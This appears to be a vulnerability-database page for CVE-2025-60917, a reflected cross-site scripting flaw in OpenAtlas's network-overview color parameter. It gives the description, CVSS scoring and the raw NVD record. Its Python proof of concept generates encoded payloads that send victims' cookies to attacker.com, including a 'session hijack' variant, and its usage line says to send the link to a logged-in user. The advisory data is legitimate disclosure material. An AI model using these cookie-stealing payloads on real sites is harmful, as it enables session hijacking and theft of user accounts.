Security Vulnerability Report
中文
CVE-2025-60917 CVSS 4.6 MEDIUM

CVE-2025-60917

Published: 2025-11-24 16:15:51
Last Modified: 2025-11-28 16:22:58
Source: [email protected]

Description

A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter.

CVSS Details

CVSS Score
4.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:* - VULNERABLE
Openatlas < v8.12.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-60917 PoC - Openatlas Reflected XSS # Target: Openatlas before v8.12.0 # Endpoint: /overview/network/?color=<payload> import urllib.parse def generate_xss_payload(): """Generate XSS payload for CVE-2025-60917""" # Basic XSS payload using img onerror payload = '<img src=x onerror=alert(document.cookie)>' return urllib.parse.quote(payload) def generate_poc_url(target_url): """Generate PoC URL for the vulnerability""" payload = generate_xss_payload() poc_url = f"{target_url}/overview/network/?color={payload}" return poc_url def generate_stealer_payload(): """Generate cookie stealer payload""" # Cookie stealing payload stealer_code = '''<img src=x onerror= "fetch('https://attacker.com/steal?cookie='+document.cookie)">''' return urllib.parse.quote(stealer_code) def generate_session_hijack_payload(): """Generate session hijacking payload""" payload = '''<script> fetch('https://attacker.com/log?data='+btoa(document.cookie)); </script>''' return urllib.parse.quote(payload) if __name__ == '__main__': target = 'http://target-openatlas.com' poc_url = generate_poc_url(target) print(f"Target: {target}") print(f"PoC URL: {poc_url}") print("\nUsage: Send this URL to a logged-in user") print("When visited, the payload will execute JavaScript")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-60917", "sourceIdentifier": "[email protected]", "published": "2025-11-24T16:15:51.190", "lastModified": "2025-11-28T16:22:57.727", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A reflected cross-site scripting (XSS) vulnerability in the /overview/network/ endpoint of Austrian Archaeological Institute Openatlas before v8.12.0 allows attackers to execute arbitrary code in the context of a user's browser via injecting a crafted payload into the color parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.1, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:craws:openatlas:*:*:*:*:*:*:*:*", "versionEndIncluding": "8.12.0", "matchCriteriaId": "31077621-F722-46FF-9FFA-CD3D23CD1479"}]}]}], "references": [{"url": "https://www.sec4you-pentest.com/schwachstelle/openatlas-schwachstelle-xss-in-farb-feldern-ort/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.sec4you-pentest.com/schwachstellen/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.